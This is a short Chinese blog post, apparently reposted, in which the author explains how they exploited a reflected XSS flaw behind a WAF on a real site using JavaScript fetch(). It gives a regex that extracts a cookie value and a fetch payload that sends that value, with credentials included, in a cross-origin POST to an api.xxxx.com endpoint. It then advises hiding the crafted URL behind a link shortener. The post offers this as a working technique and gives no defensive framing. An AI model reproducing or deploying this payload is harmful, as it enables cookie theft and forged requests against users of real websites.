xss利用之fetch

栏目: 编程工具 · 发布时间: 5年前

内容简介:偶然间发现某站有个漏洞因为有WAF不好利用,我之前是不知道能咋利用,然后大佬说能XSS利用,叫我写个fetch利用,

偶然间发现某站有个漏洞

因为有WAF不好利用,我之前是不知道能咋利用,

然后大佬说能XSS利用,叫我写个fetch利用,

我?????

试着去学fetch这个东西了

于是有了此文

正文

首先看看说明文档那个样子 https://segmentfault.com/a/1190000007019545

大致理解了

然后发出一个fetch的post请求

也就是这个样子

fetch("http://192.168.199.141:3000/api/user/",{
  method:'POST',
  headers:{
     'Content-Type': 'application/json'
  },
  body:JSON.stringify({
    name:'john',
    pass:'xioayuan'
  })
})
.then((response)=>response.json())
.then((responseJsonData)=>{
  alert("请求成功");
  console.log(responseJsonData);
})
.catch((error)=>{
  alert(error);
})

如果XSS点能利用,就在这里发送一个fetch请求,来作为利用点

假如利用点要用到cookie里面的某些值,我们可以用js来提取cookie里的特定段值,可以写个正则提取比如

document.cookie.replace(/(?:(?:^|.*;\s*)key\s*\=\s*([^;]*).*$)|^.*$/, '$1')

这样就能提取到key的值了

上面的body是一个json类型,如果是一般类型的我们可以直接写一个这样的JS

var form = 'xxxxxx'+document.cookie.replace(/(?:(?:^|.*;\s*)key\s*\=\s*([^;]*).*$)|^.*$/, '$1');
fetch('https://api.xxxx.com/add', {
method: "POST",
mode: "cors",
credentials: 'include',
headers: {
"Content-Type": "application/x-www-form-urlencoded"
},
body: form
});

直接在url里面构造就行了,然后把链接去生成一个短链接,就算完成了。

这样一个反射XSS的利用还是蛮有意思的。


以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持 码农网

查看所有标签

猜你喜欢:

本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们

网站开发案例课堂:HTML5+CSS3+JavaScript网页设计案例课堂

网站开发案例课堂:HTML5+CSS3+JavaScript网页设计案例课堂

刘玉红 / 2015-1-1 / 68

《网站开发案例课堂:HTML5+CSS3+JavaScript网页设计案例课堂》作者根据在长期教学中积累的网页设计教学经验,完整、详尽地介绍HTML 5 + CSS 3 + JavaScript网页设计技术。 《网站开发案例课堂:HTML5+CSS3+JavaScript网页设计案例课堂》共分24章,分别介绍HTML 5概述、HTML 5网页文档结构、HTML 5网页中的文本和图像、HTML......一起来看看 《网站开发案例课堂:HTML5+CSS3+JavaScript网页设计案例课堂》 这本书的介绍吧!

JSON 在线解析
JSON 在线解析

在线 JSON 格式化工具

SHA 加密
SHA 加密

SHA 加密工具

XML 在线格式化
XML 在线格式化

在线 XML 格式化压缩工具